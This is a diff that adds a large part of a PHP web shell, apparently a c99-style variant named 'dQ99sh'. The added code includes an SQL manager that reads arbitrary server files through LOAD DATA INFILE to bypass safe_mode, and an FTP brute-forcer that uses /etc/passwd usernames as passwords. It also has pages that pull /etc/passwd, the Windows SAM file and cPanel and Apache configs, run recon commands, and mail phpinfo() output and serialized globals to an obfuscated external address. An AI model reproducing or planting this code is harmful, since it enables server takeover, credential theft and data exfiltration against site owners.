+      if ($sql_tbl_act == "browse") {
+        $sql_tbl_ls = abs($sql_tbl_ls);
+        $sql_tbl_le = abs($sql_tbl_le);
+        echo "<hr size=\"1\" noshade>";
+        echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+        $b = 0;
+        for($i=0;$i<$numpages;$i++) {
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+          echo $i;
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+          if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+          else {echo "&nbsp;";}
+        }
+        if ($i == 0) {echo "empty";}
+        echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+        echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
+        echo "<tr>";
+        echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+        for ($i=0;$i<mysql_num_fields($result);$i++) {
+          $v = mysql_field_name($result,$i);
+          if ($e[0] == "a") {$s = "d"; $m = "asc";}
+          else {$s = "a"; $m = "desc";}
+          echo "<td>";
+          if (empty($e[0])) {$e[0] = "a";}
+          if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+          else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+          echo "</td>";
+        }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>+</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act)) {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb") {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus") {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars") {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes") {
+     if (!empty($kill)) {
+       $query = "KILL ".$kill.";";
+       $result = mysql_query($query, $sql_sock);
+       echo "<b>Process #".$kill." was killed.</b>";
+     }
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb);
+    }
+   }
+  }
+}
+echo "</td></tr></table>\n";
+if ($sql_sock) {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
+}
+echo "</table>\n";
+}
+//End of SQL Manager
+if ($act == "ftpquickbrute") {
+echo "<center><table><tr><td class=barheader colspan=2>";
+echo ".: Ftp Quick Brute :.</td></tr>";
+echo "<tr><td>";
+if ($win) { echo "Can't run on Windows!"; }
+else {
+  function dQ99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
+    if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+    else {$TRUE = TRUE;}
+    if ($TRUE) {
+      $sock = @ftp_connect($host,$port,$timeout);
+      if (@ftp_login($sock,$login,$pass)) {
+        echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+        ob_flush();
+        return TRUE;
+      }
+    }
+  }
+  if (!empty($submit)) {
+    if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+    $fp = fopen("/etc/passwd","r");
+    if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+    else {
+      if ($fqb_logging) {
+        if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+        else {$fqb_logfp = FALSE;}
+        $fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+        if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      }
+      ob_flush();
+      $i = $success = 0;
+      $ftpquick_st = getmicrotime();
+      while(!feof($fp)) {
+        $str = explode(":",fgets($fp,2048));
+        if (dQ99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
+          echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+          $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+          if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+          $success++;
+          ob_flush();
+        }
+        if ($i > $fqb_lenght) {break;}
+        $i++;
+      }
+      if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+      $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+      echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+      $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);}
+      fclose($fqb_logfp);
+    }
+  }
+  else {
+    $logfile = $tmpdir_logs."dQ99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+    $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+    echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\">".
+         "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
+         "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
+         "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
+         "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
+         "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
+  }
+  echo "</td></tr></table></center>";
+}
+}
+if ($act == "d") {
+  if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
+  else {
+    echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+    if (!$win) {
+      echo "<tr><td><b>Owner/Group</b></td><td> ";
+      $ow = posix_getpwuid(fileowner($d));
+      $gr = posix_getgrgid(filegroup($d));
+      $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+    }
+    echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
+  }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); dQ99shexit();}
+if ($act == "security") {
+  echo "<div class=barheader>.: Server Security Information :.</div>\n".
+       "<table>\n".
+       "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>\n";
+  echo "<td>Password File</td><td>";
+  if (!$win) {
+    if ($nixpasswd) {
+      if ($nixpasswd == 1) {$nixpasswd = 0;}
+      echo "*nix /etc/passwd:<br>";
+      if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+      if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+      echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+      $i = $nixpwd_s;
+      while ($i < $nixpwd_e) {
+        $uid = posix_getpwuid($i);
+        if ($uid) {
+          $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+          echo join(":",$uid)."<br>";
+        }
+        $i++;
+      }
+    }
+    else {echo "<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b>Download /etc/passwd</b></a>";}
+  }
+  else {
+    $v = $_SERVER["WINDIR"]."\repair\sam";
+    if (!file_get_contents($v)) { echo "<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><b>Download password file</b></a>"; }
+  }
+  echo "</td></tr>\n";
+  echo "<tr><td>Config Files</td><td>\n";
+  if (!$win) {
+    $v = array(
+        array("User Domains","/etc/userdomains"),
+        array("Cpanel Config","/var/cpanel/accounting.log"),
+        array("Apache Config","/usr/local/apache/conf/httpd.conf"),
+        array("Apache Config","/etc/httpd.conf"),
+        array("Syslog Config","/etc/syslog.conf"),
+        array("Message of The Day","/etc/motd"),
+        array("Hosts","/etc/hosts")
+    );
+    $sep = "/";
+  }
+  else {
+    $windir = $_SERVER["WINDIR"];
+    $etcdir = $windir . "\system32\drivers\etc\\";
+    $v = array(
+        array("Hosts",$etcdir."hosts"),
+        array("Local Network Map",$etcdir."networks"),
+        array("LM Hosts",$etcdir."lmhosts.sam"),
+    );
+    $sep = "\\";
+  }
+  foreach ($v as $sec_arr) {
+    $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
+    $sec_d = rtrim($sec_arr[1],$sec_f);
+    $sec_full = $sec_d.$sec_f;
+    $sec_d = rtrim($sec_d,$sep);
+    if (file_get_contents($sec_full)) {
+      echo " [ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><b>".$sec_arr[0]."</b></a> ] \n";
+    }
+  }
+  echo "</td></tr>";
+
+  function displaysecinfo($name,$value) {
+    if (!empty($value)) {
+      echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>\n";
+    }
+  }
+  if (!$win) {
+    displaysecinfo("OS Version",dQ99exec("cat /proc/version"));
+    displaysecinfo("Kernel Version",dQ99exec("sysctl -a | grep version"));
+    displaysecinfo("Distrib Name",dQ99exec("cat /etc/issue.net"));
+    displaysecinfo("Distrib Name (2)",dQ99exec("cat /etc/*-realise"));
+    displaysecinfo("CPU Info",dQ99exec("cat /proc/cpuinfo"));
+    displaysecinfo("RAM",dQ99exec("free -m"));
+    displaysecinfo("HDD Space",dQ99exec("df -h"));
+    displaysecinfo("List of Attributes",dQ99exec("lsattr -a"));
+    displaysecinfo("Mount Options",dQ99exec("cat /etc/fstab"));
+    displaysecinfo("lynx installed?",dQ99exec("which lynx"));
+    displaysecinfo("links installed?",dQ99exec("which links"));
+    displaysecinfo("GET installed?",dQ99exec("which GET"));
+    displaysecinfo("Where is Apache?",dQ99exec("whereis apache"));
+    displaysecinfo("Where is perl?",dQ99exec("whereis perl"));
+    displaysecinfo("Locate proftpd.conf",dQ99exec("locate proftpd.conf"));
+    displaysecinfo("Locate httpd.conf",dQ99exec("locate httpd.conf"));
+    displaysecinfo("Locate my.conf",dQ99exec("locate my.conf"));
+    displaysecinfo("Locate psybnc.conf",dQ99exec("locate psybnc.conf"));
+  }
+  else {
+    displaysecinfo("OS Version",dQ99exec("ver"));
+    displaysecinfo("Account Settings",dQ99exec("net accounts"));
+    displaysecinfo("User Accounts",dQ99exec("net user"));
+  }
+  echo "</table>\n";
+}
+if ($act == "mkfile") {
+  if ($mkfile != $d) {
+    if ($overwrite == 0) {
+      if (file_exists($mkfile)) { echo "<b>FILE EXIST:</b> $overwrite ".htmlspecialchars($mkfile); }
+    }
+    else {
+      if (!fopen($mkfile,"w")) { echo "<b>ACCESS DENIED:</b> ".htmlspecialchars($mkfile); }
+      else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile); }
+    }
+  }
+  else { echo "<div class=dQerrmsg>Enter filename!</div>\r\n"; }
+}
+if ($act == "encoder") {
+echo "<script language=\"javascript\">function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script>".
+     "<form name=\"encoder\" action=\"".$surl."\" method=POST>".
+     "<input type=hidden name=act value=encoder>".
+     "<center><table class=contents>".
+     "<tr><td colspan=4 class=barheader>.: Encoder :.</td>".
+     "<tr><td colspan=2>Input:</td><td><textarea name=\"encoder_input\" id=\"input\" cols=70 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br>".
+     "<input type=submit value=\"calculate\"></td></tr>".
+     "<tr><td rowspan=4>Hashes:</td>";
+foreach(array("md5","crypt","sha1","crc32") as $v) {
+  echo "<td>".$v.":</td><td><input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly></td></tr><tr>";
+}
+echo "</tr>".
+     "<tr><td rowspan=2>Url:</td>".
+     "<td>urlencode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>urldecode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly></td></tr>".
+     "<tr><td rowspan=2>Base64:</td>".
+     "<td>base64_encode:</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></td></tr>".
+     "<tr><td>base64_decode:</td><td>";
+if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"Failed!\" disabled readonly>";}
+else {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) { echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>"; }
+  else { $rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>"; }
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>";
+}
+echo "</td></tr>".
+     "<tr><td>Base convertations:</td><td>dec2hex</td><td><input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+$c = strlen($encoder_input);
+for($i=0;$i<$c;$i++) {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+}
+echo "\" readonly></td></tr></table></center></form>";
+}
+if ($act == "fsbuff") {
+  $arr_copy = $sess_data["copy"];
+  $arr_cut = $sess_data["cut"];
+  $arr = array_merge($arr_copy,$arr_cut);
+  if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
+  else {
+    $dQ_infohead = "File-System Buffer";
+    $ls_arr = $arr;
+    $disp_fullpath = TRUE;
+    $act = "ls";
+  }
+}
+if ($act == "selfremove") {
+  if (($submit == $rndcode) and ($submit != "")) {
+    if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".$sh_name."!"; dQ99shexit(); }
+    else { echo "<center><b>Can't delete ".__FILE__."!</b></center>"; }
+  }
+  else {
+    if (!empty($rndcode)) {echo "<b>Error: incorrect confirmation!</b>";}
+    $rnd = rand(0,9).rand(0,9).rand(0,9);
+    echo "<form action=\"".$surl."\">\n".
+         "<input type=hidden name=act value=selfremove>".
+         "<input type=hidden name=rndcode value=\"".$rnd."\">".
+         "<b>Kill-shell: ".__FILE__." <br>".
+         "<b>Are you sure? For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=text name=submit>&nbsp;<input type=submit value=\"YES\">\n".
+         "</form>\n";
+  }
+}
+if ($act == "update") {
+  $ret = dQ99sh_getupdate(!!$confirmupdate);
+  echo "<b>".$ret."</b>";
+  if (stristr($ret,"new version")) {
+    echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";
+  }
+}
+if ($act == "feedback") {
+  $suppmail = base64_decode("ZGhpZXF3ZWJtYXJrZXJAeWFob28uY29t");
+  if (!empty($submit)){
+    $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+    $body = $sh_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+    if (!empty($fdbk_ref)) {
+      $tmp = @ob_get_contents();
+      ob_clean();
+      phpinfo();
+      $phpinfo = base64_encode(ob_get_contents());
+      ob_clean();
+      echo $tmp;
+      $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+    }
+    mail($suppmail,$sh_name." feedback #".$ticket,$body,"FROM: ".$suppmail);
+    echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+  }
+  else {
+    echo "<form action=\"".$surl."\" method=POST>".
+         "<input type=hidden name=act value=feedback>".
+         "<table class=contents><tr><td class=barheader colspan=2>".
+         ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.</td></tr>".
+         "<tr><td>Your name:</td><td><input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"></td</tr>".
+         "<tr><td>Your e-mail:</td><td><input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"></td></tr>".
